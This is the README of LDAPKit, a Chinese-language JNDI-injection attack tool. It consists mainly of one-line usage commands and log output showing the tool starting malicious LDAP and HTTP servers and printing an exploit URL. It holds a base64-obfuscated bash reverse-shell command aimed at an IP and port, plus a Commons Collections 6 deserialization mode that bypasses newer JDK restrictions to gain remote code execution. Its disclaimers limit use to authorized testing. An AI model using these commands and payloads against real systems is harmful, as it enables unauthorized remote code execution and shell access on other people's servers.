工具仅用于安全研究以及内部自查,禁止使用工具发起非法攻击,造成的后果使用者负责
无需自行编译Java
文件和开启HTTP
服务,一切自动
只要一行:java -jar LDAPKit.jar --cmd [命令]
例如:java -jar LDAPKit.jar --cmd notepad.exe
注意:如果直接java -jar LDAPKit.jar
默认命令是calc.exe
弹计算器
___ ________ ________ ___ ___ __ ___ _________
|\ \|\ ___ \|\ ___ \|\ \|\ \|\ \ |\ \|\___ ___\
\ \ \ \ \\ \ \ \ \_|\ \ \ \ \ \/ /|\ \ \|___ \ \_|
__ \ \ \ \ \\ \ \ \ \ \\ \ \ \ \ ___ \ \ \ \ \ \
|\ \\_\ \ \ \\ \ \ \ \_\\ \ \ \ \ \\ \ \ \ \ \ \ \
\ \________\ \__\\ \__\ \_______\ \__\ \__\\ \__\ \__\ \ \__\
\|________|\|__| \|__|\|_______|\|__|\|__| \|__|\|__| \|__|
11:32:56 [INFO] [org.sec.Main] start jndi kit
11:32:56 [INFO] [org.sec.Main] cmd: notepad.exe
11:32:56 [INFO] [org.sec.Http] start http server: 0.0.0.0:8000
11:32:56 [INFO] [org.sec.Ldap] start ldap server: 0.0.0.0:1389
|--------------------------------------------------------|
|------Payload: ldap://127.0.0.1:1389/badClassName-------|
|--------------------------------------------------------|
然后就可以测试各种漏洞了
加入了针对Linux
的反弹shell
功能,未测试
命令:java -jar LDAPKit.jar --reverse IP:PORT
例如:java -jar LDAPKit.jar --reverse 192.168.0.1:8080
___ ________ ________ ___ ___ __ ___ _________
|\ \|\ ___ \|\ ___ \|\ \|\ \|\ \ |\ \|\___ ___\
\ \ \ \ \\ \ \ \ \_|\ \ \ \ \ \/ /|\ \ \|___ \ \_|
__ \ \ \ \ \\ \ \ \ \ \\ \ \ \ \ ___ \ \ \ \ \ \
|\ \\_\ \ \ \\ \ \ \ \_\\ \ \ \ \ \\ \ \ \ \ \ \ \
\ \________\ \__\\ \__\ \_______\ \__\ \__\\ \__\ \__\ \ \__\
\|________|\|__| \|__|\|_______|\|__|\|__| \|__|\|__| \|__|
10:46:04 [INFO] [org.sec.Main] start jndi kit
10:46:04 [INFO] [org.sec.Main] use reverse shell
10:46:04 [INFO] [org.sec.Main] ignore command input
10:46:04 [INFO] [org.sec.Main] cmd: bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMS84MDgwIDA+JjE=}|{base64,-d}|{bash,-i}
10:46:04 [INFO] [org.sec.Http] start http server: 0.0.0.0:8000
10:46:04 [INFO] [org.sec.Ldap] start ldap server: 0.0.0.0:1389
|--------------------------------------------------------|
|------Payload: ldap://127.0.0.1:1389/badClassName-------|
|--------------------------------------------------------|
然后就可以测试各种漏洞了
可以绕过高版限制,利用本地gadget
触发反序列化漏洞造成RCE
命令:java -jar LDAPKit.jar --cmd [命令] --cc
例如:java -jar LDAPKit.jar --cmd calc.exe --cc
___ ________ ________ ___ ___ __ ___ _________
|\ \|\ ___ \|\ ___ \|\ \|\ \|\ \ |\ \|\___ ___\
\ \ \ \ \\ \ \ \ \_|\ \ \ \ \ \/ /|\ \ \|___ \ \_|
__ \ \ \ \ \\ \ \ \ \ \\ \ \ \ \ ___ \ \ \ \ \ \
|\ \\_\ \ \ \\ \ \ \ \_\\ \ \ \ \ \\ \ \ \ \ \ \ \
\ \________\ \__\\ \__\ \_______\ \__\ \__\\ \__\ \__\ \ \__\
\|________|\|__| \|__|\|_______|\|__|\|__| \|__|\|__| \|__|
11:08:25 [INFO] [org.sec.Main] start jndi kit
11:08:25 [INFO] [org.sec.Main] cmd: calc.exe
11:08:25 [INFO] [org.sec.Http] start http server: 0.0.0.0:8000
11:08:25 [INFO] [org.sec.Ldap] use commons collections 6 payload
11:08:25 [INFO] [org.sec.Ldap] start ldap server: 0.0.0.0:1389
|--------------------------------------------------------|
|------Payload: ldap://127.0.0.1:1389/badClassName-------|
|--------------------------------------------------------|
然后就可以测试各种漏洞了
未经授权许可使用LDAPKit
攻击目标是非法的
本程序应仅用于授权的安全测试与研究目的